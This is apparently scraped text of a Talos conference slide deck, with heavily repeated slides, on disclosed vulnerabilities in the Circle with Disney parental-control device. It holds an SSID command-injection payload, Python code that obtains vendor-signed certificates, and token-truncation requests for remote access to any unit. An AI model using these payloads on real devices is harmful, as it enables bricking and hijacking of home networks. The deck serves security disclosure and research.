Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 2: Access Point List Parsing The $best_ch var is then used like so: sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf So if we choose an SSID as such: ssid2=P"Channel: x /;:x/g;bx #Signal" the injection creates an infinite loop by defining a "x/g" label in sed, and then by always jumping to it. https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0446 Wifi SSID Vulnerabilities

CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 2: Access Point List Parsing The $best_ch var is then used like so: sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf So if we choose an SSID as such: ssid2=P"Channel: x /;:x/g;bx #Signal" the injection creates an infinite loop by defining a "x/g" label in sed, and then by always jumping to it. Which causes the device to get stuck while booting. https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0446 Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability

In case Mom or Dad need to monitor the kids away from home, Circle with Disney has a wonderful system to allow for remote access (I'm sorry in advance for the quality of the following slides) Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability In case Mom or Dad need to monitor the kids away from home, Circle with Disney has a wonderful system to allow for remote access Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability In case Mom or Dad need to monitor the kids away from home, Circle with Disney has a wonderful system to allow for remote access

remote.meetcircle.co Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability There are a few valid questions to be had at this point though: - What happened to the home router's natural firewall/NAT? remote.meetcircle.co - How does the cloud know which home to hit? - How does the father authenticate to the remote server??? And the setup is admittedly a little more complicated...

Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability First things first, how can remote.meetcircle.co even speak to the circle, from a network perspective? remote.meetcircle.co Well, there's a beacon. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The rclient and goclient services running on the Circle constantly ping out to Meetcircle.co domains. UDP 'Ping' Messages remote.meetcircle.co

Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The rclient and goclient services running on the Circle constantly ping out to Meetcircle.co domains.... Which are met with 'Pong' Messages. This is done to maintain a hole through A home router's NAT/Firewall UDP 'Ping' Messages UDP 'Pong' Messages remote.meetcircle.co Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The rclient and goclient services running on the Circle constantly ping out to Meetcircle.co domains.... Which are met with 'Pong' Messages. This is done to maintain a hole through A home router's NAT/Firewall... UDP 'Ping' Messages UDP 'Pong' Messages remote.meetcircle.co

UDP 'Connect' Messages Through which a udp 'connect' message can be sent. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability [*.*] Listening on 192.168.11.2:8988 [$.$] local:udp|remote:udp 0000 70 69 6e 67 32 20 38 43 45 32 44 41 46 31 41 42 0010 31 36 20 69 64 3d 34 30 39 64 65 31 39 37 31 38 0020 35 39 34 62 34 39 62 38 34 31 37 66 63 62 34 31 0030 66 65 36 63 66 62 63 62 35 38 20 74 61 67 3d 65 0040 61 38 32 64 33 63 36 65 64 39 61 30 34 31 32 62 0050 35 33 34 35 3e 61 6d 38 33 33 36 61 31 35 65 38 0060 62 38 64 38 36 37 31 63 66 35 66 34 63 33 30 [o.o] Sent 111 bytes to remote (45.79.169.242:8988) ping2 8CE2DAF1EC 16 id=409de33718

594c3a813fcb21 fe6cfbcb58 tag=e a82d3c3ed9a0402b 53456abcd6a15e8 b8d8671cf5f4c 0000 70 6f 6e 67 20 38 43 45 32 41 41 4a 39 45 42 30 0010 36 [o.o] Sent 17 bytes to local (192.168.11.2:8988) pong 8CE2DAE1EB0 6 Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability And this UDP 'connect' message would prompt an SSL connection to be initiated by the Circle to the remote server. This SSL tunnel could then be used to access a hidden API for remote

control of the device, more than just the normal web API. UDP 'Connect' Messages SSL Connection Initiation SSL Commands remote.meetcircle.co Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability [>.>] Received Connection from ('192.168.2.104', 33392) 0000 5a 02 00 80 01 38 43 45 32 44 41 46 32 30 30 30 Z....8CE2DAF23E1 0010 33 2c 30 30 3a 30 30 3a 30 30 3a 30 30 3a 30 30 3,00:00:00:00:00 0020 3a 30 30 20 69 64 3d 33 35 63 61 63 36 63 63 63 :00 id= .... tag= 00X0 20 76 3d 32 v=2 [>.>] Sent X bytes to remote ()

0000 5a 06 00 03 30 02 31 [>.>] Sent 7 bytes to remote () 0000 0010 0020 0030 Z...0.1 5a 06 00 5d 31 03 38 43 45 32 44 41 32 30 30 30 Z..]1.8CF2DAFABC 31 33 2d 79 42 37 54 48 4a 46 79 5a 39 75 4b 49 12-yB7abcdeZ9uKI 6e 62 6d 2d 32 30 31 37 30 37 32 31 2e 31 39 32 nbm-20170721.192 33 32 35 325 Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Back to the questions:

- What happened to the home router's natural firewall/NAT? UDP Beacon->Reverse SSL Tunnel. remote.meetcircle.co - How does the cloud know which home to hit? - How does the father authenticate to the remote server??? Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability We can actually answer these next two at the same time. remote.meetcircle.co - How does the cloud know which home to hit?

- How does the father authenticate to the remote server??? Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability remote.meetcircle.co (At least on an android phone) Upon inititial configuration of the Disney Circle by the administrator, a base64 encoded PKCS12 blob is generated on the admin's phone, inside of a sqlite3 database in the /data partition of the phone. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability remote.meetcircle.co

(At least on an android phone) Upon inititial configuration of the Disney Circle by the administrator, a base64 encoded PKCS12 blob is generated on the admin's phone, inside of a sqlite3 database in the /data partition of the phone. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability [email protected]<(^_^)>: openssl pkcs12 -in reroute.pkcs12 Enter Import Password: MAC verified OK Bag Attributes [...] localKeyID: 63 0D C6 B8 2C FF FD 6F CF B0 73 71 EC FD A9 5A F4 7A EB 25 subject=/C=US/ST=OR/L=Portland/O=Circle/OU=8CE2DAA12345eab5bdcac8123459f69d175546abcdef_CIRCLEHOME/CN=vpn.meetcircle.co issuer=/C=US/ST=OR/O=Circle/CN=Circle Go Intermediate Authority -----BEGIN CERTIFICATE----[] -----END CERTIFICATE----Bag Attributes

friendlyName: Circle subject=/C=US/ST=OR/O=Circle/CN=Circle Go Intermediate Authority issuer=/C=US/ST=OR/L=Portland/O=Circle/CN=Circle Go Root Certificate Authority -----BEGIN CERTIFICATE----MIIFpTCCA42gAwIBAgICEAAwDQYJKoZIhvcNAQELBQAwbTE=[...] Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability In looking at the .smali that generates the request to get this particular certificate, we see this: IP="vpncc.meetcircle.co" data= { "gotoken":"12341234-<(^_^)>-lol-abcd-1234", "circleid":"8CE2DA1234AB", "devid":"eab5bdcac8123459f69d175546abcdef_CIRCLEHOME", "host":"vpn.meetcircle.co" } r = requests.post("http://%s:8089/api/CERT/clientCert?circleid=%s&gotoken=%s&devid= %s&host=%s"%(IP,circleid,gotoken,devid,host) The above code resulted in a certificate as such:

subject=/C=US/ST=OR/L=Portland/O=Circle/OU=8CE2DA1234AB- 12341234-<(^_^)>-lol-abcd1234_CIRCLEHOME/CN=vpn.meetcircle.co Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Hilariously, we could actually generate a certificate valid for any domain, and have it signed by the Meetcircle CA, as the only fields that mattered were the gotoken and circleid fields, the former of which was a UUID generated by an unknown hashing algorithm of the circleid.... IP="vpncc.meetcircle.co" data= { "gotoken":"12341234-<(^_^)>-lol-abcd-1234", "circleid":"8CE2DA1234AB", "devid":"eab5bdcac8123459f69d175546abcdef_CIRCLEHOME", "host":"vpn.meetcircle.co" } r = requests.post("http://%s:8089/api/CERT/clientCert?circleid=%s&gotoken=%s&devid= %s&host=%s"%(IP,circleid,gotoken,devid,host) Cloud Routing Vulnerability

CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Hilariously, we could actually generate a certificate valid for any domain, and have it signed by the Meetcircle CA, as the only fields that mattered were the gotoken and circleid fields, the former of which was a UUID generated by an unknown hashing algorithm of the circleid.... And this made me sad, as it was a fair assumption to say that using the OU string for authentication and also for routing to the correct Circle would be a relatively safe and reliable way to make things work (assuming the hashing function wasn't guessed). Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Hilariously, we could actually generate a certificate valid for any domain, and have it signed by the Meetcircle CA, as the only fields that mattered were the gotoken and circleid fields, the former of which was a UUID generated by an unknown hashing algorithm of the circleid.... And this made me sad, as it was a fair assumption to say that using the OU string for authentication and also for routing to the correct Circle would be a relatively safe and reliable way to make things work (assuming the hashing function wasn't guessed). So there went my plan for bricking or rooting any Circle in the world with network connectivity...

Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Hilariously, we could actually generate a certificate valid for any domain, and have it signed by the Meetcircle CA, as the only fields that mattered were the gotoken and circleid fields, the former of which was a UUID generated by an unknown hashing algorithm of the circleid.... And this made me sad, as it was a fair assumption to say that using the OU string for authentication and also for routing to the correct Circle would be a relatively safe and reliable way to make things work (assuming the hashing function wasn't guessed). So there went my plan for bricking or rooting any Circle in the world with network connectivity... But thankfully my assumption was wrong <(^_^)> Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The only thing that determined which Circle is the destination was the token used in authentication... GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12-yB7abcdeZ9uKInbm-20170721

Which unfortunately was impossible to generate or bruteforce normally. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The only thing that determined which Circle is the destination was the token used in authentication... GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12-yB7abcdeZ9uKInbm-20170721 Which unfortunately was impossible to generate or bruteforce normally. But thankfully, you didn't need the complete token, the only thing that Actually mattered was the first portion: GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12 Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability The only thing that determined which Circle is the destination was

the token used in authentication... GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12-yB7abcdeZ9uKInbm-20170721 Which unfortunately was impossible to generate or bruteforce normally. But thankfully, you didn't need the complete token, the only thing that Actually mattered was the first portion: GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12 Btws, thats the MAC address of the device. Cloud Routing Vulnerability CVE-2017-12085 - Circle with Disney Token Routing Vulnerability Besides the boring rooting and bricking of any Circle in the world, we could also spam a single text messages to the admin of the device (lol). 0000 47 45 54 20 2f 61 70 69 2f 50 41 53 53 43 4f 44 0010 45 2f 73 6d 73 3f 61 70 69 3d 31 2e 30 26 74 6f 0020 6b 65 6e 3d

0030 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 0040 20 72 65 6d 6f 74 65 2e 6d 65 65 74 63 69 72 63 0050 6c 65 2e 63 6f 3a 34 35 36 37 31 0d 0a 43 6f 6e 0060 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 0070 69 76 65 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 0080 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 0090 61 74 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 00a0 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 70 79 00b0 74 68 6f 6e 2d 72 65 71 75 65 73 74 73 2f 32 2e 00c0 31 37 2e 33 0d 0a 0d 0a 0d 0a 17.3...... [o.o] Sent 202 bytes to remote (45.79.169.242:45671) GET /api/PASSCOD E/sms?api=1.0&to ken= HTTP/1.1..Host: remote.meetcirc le.co:45671..Con nection: keep-al

ive..Accept-Enco ding: gzip, defl ate..Accept: */* ..User-Agent: py thon-requests/2. 17.3...... Claudio was not happy about his one.... talosintelligence.com blog.talosintel.com @talossecurity Lilith Wyatt <(^_^)> Vulndev Research Engineer.

Recently Viewed Presentations

  • Ending homelessness: what needs to change?

    Ending homelessness: what needs to change?

    Panel discussion - Homelessness: what next for legal reform? Maeve McGoldrick (Chair),Head of Policy and Campaigns, Crisis Juliet Mwaniki, Crisis AmbassadorRobert Aldridge, CEO Homeless Action ScotlandDr Peter Mackie, Lecturer University of Cardiff Professor Suzanne Fitzpatrick, Herriot-Watt University
  • Chapter 16 Haircutting  Copyright 2012 Milady, a part

    Chapter 16 Haircutting Copyright 2012 Milady, a part

    The hair that falls in front of the ear is considered the front (some side hair will be included here). Sides: The area from the back of the ear forward, and below the parietal ridge. Crown: The area between the...
  • UW Viking enabling operations 1979-1982 NASA Deep Space

    UW Viking enabling operations 1979-1982 NASA Deep Space

    Public Outreach Hundreds of school interactions, the permanent Viking View of Mars exhibit Data and Information Distribution Multi-cast distribution and validation Coe Primary school Grades K-5 Not operational UW Viking "enabling" operations 1979-1982 NASA Deep Space Network - JPL -...
  • Persuasive Strategies - Crestwood High School

    Persuasive Strategies - Crestwood High School

    Arial Times New Roman Calibri Comic Sans MS Default Design Persuasive Strategies for Argumentation Position Statement Logical Appeal (Logos) Research Expert opinions Emotional Appeal (Pathos) Ethical Appeal (Ethos) Rhetorical Moment (Kairos) Assignments:
  • Quality and Efficiency Support Team (QuEST) Directorate for

    Quality and Efficiency Support Team (QuEST) Directorate for

    Ruth Glassborow, Mental Health Lead, QuEST Mental Health - The Challenge One of the top public health challenges. Mental illness: affect more than a third of population each year second largest contributor to the burden of disease (19% of DALYs)...
  • Plutarch&#x27;s Life of Alcibiades - Binghamton University

    Plutarch's Life of Alcibiades - Binghamton University

    Eros, Zeus with thunderbolts. "He had a golden shield made for him, which was emblazoned not with any ancestral device, but with the figure of Eros armed with a thunderbolt." (Plutarch . Alcibiades. p. 58) "The sway which he held...
  • Online Homework + e-Textbook = Integrated Online Learning

    Online Homework + e-Textbook = Integrated Online Learning

    … that interest led to meeting and working with Perry Samson who is well known for his LectureTools. We began working on LectureTools model that converted the Stats 250 Textbook to an online version … available for students since Fall...
  • Chapter 1 Structure and Bonding - faculty.swosu.edu

    Chapter 1 Structure and Bonding - faculty.swosu.edu

    Transfer of electron density away from M+ stabilizes the complex over s-bonding only F- example Filled p-orbitals are the only orbitals capable of p-interactions 1 lone pair used in s-bonding Other lone pairs p-bond The filled p-orbitals are lower in...